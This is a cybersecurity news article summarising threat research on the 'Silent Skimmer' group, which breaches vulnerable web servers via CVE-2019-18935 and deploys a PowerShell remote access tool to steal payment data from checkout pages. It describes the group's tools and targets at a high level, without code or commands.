The “Silent Skimmer” is a financially motivated group that has been detected targeting vulnerable online payment infrastructure, such as online businesses and Point of Sales (POS) providers.
They are mostly active in the Asia-Pacific (APAC) area. Utilizing flaws, the attacker hacks web servers and gains initial access. The final payload uses payment scraping techniques to collect consumers’ sensitive financial information from hacked websites.
The threat actor appears to be skilled in Chinese, according to information found by the BlackBerry Threat Research and Intelligence team, and they are most active in the Asia-Pacific (APAC) area and have several victims across North America.
Attend the Live DDoS Website & API Attack Simulation webinar to gain knowledge on various types of attacks and how to prevent them.
Tactics, Techniques, And Procedures (TTPs) Used In This Attack
Web applications, especially those hosted on Internet Information Services (IIS), are vulnerable to attacks by the campaign operators. Their main goal is to hack the payment checkout page and steal critical payment information from users.
“Once the attacker has obtained initial access to the web server, they deploy various tools and techniques, including open-source tools and Living Off the Land Binaries and Scripts (LOLBAS),” according to the information shared with Cyber Security News.
Researchers say the group uses tools created by GitHub user ihoney, including a port scanner and an implementation of CVE-2019-18935, a vulnerability that was previously exploited by the advanced persistent threat (APT) group HAFNIUM and the suspected Vietnamese crimeware actors XE Group.
Remote code execution (RCE) may occur as a result of CVE-2019-18935 exploitation.
Particularly, reports mention that at least five Privilege Escalations, one Remote Code Execution (RCE), one Remote Access, one Downloader/Stager, and one Post Exploitation tool are all utilized by this campaign.
The payload runs the code to deploy a PowerShell script, a RAT (remote access tool), which may carry out a variety of tasks, including gathering system data, looking up, downloading, uploading relevant files, connecting to a database, etc.
This RAT connects to a server containing various tools, including a Fast Reverse Proxy tool that enables attackers to reveal local servers from behind a NAT, remote access scripts, downloader scripts, webshells, Cobalt Strike beacons, and exploits.
Final Thoughts
The “Silent Skimmer” initiative aims to find and exploit weak web applications worldwide. Perhaps the threat actor is actively looking for new and larger targets as a result of their recent success.
“Traditionally, some servers have been noted to lack the modern security technologies currently available for traditional endpoints,” researchers said.
“That makes them an attractive target for attackers, especially considering they are easier to maintain persistence on, and bearing in mind the sensitive type of data they process, specifically payment information.”
Researchers believe that in the future, we should expect further attacks against systems like these in the same and other places.
Keep informed about the latest Cyber Security News by following us on Google News, Linkedin, Twitter, and Facebook.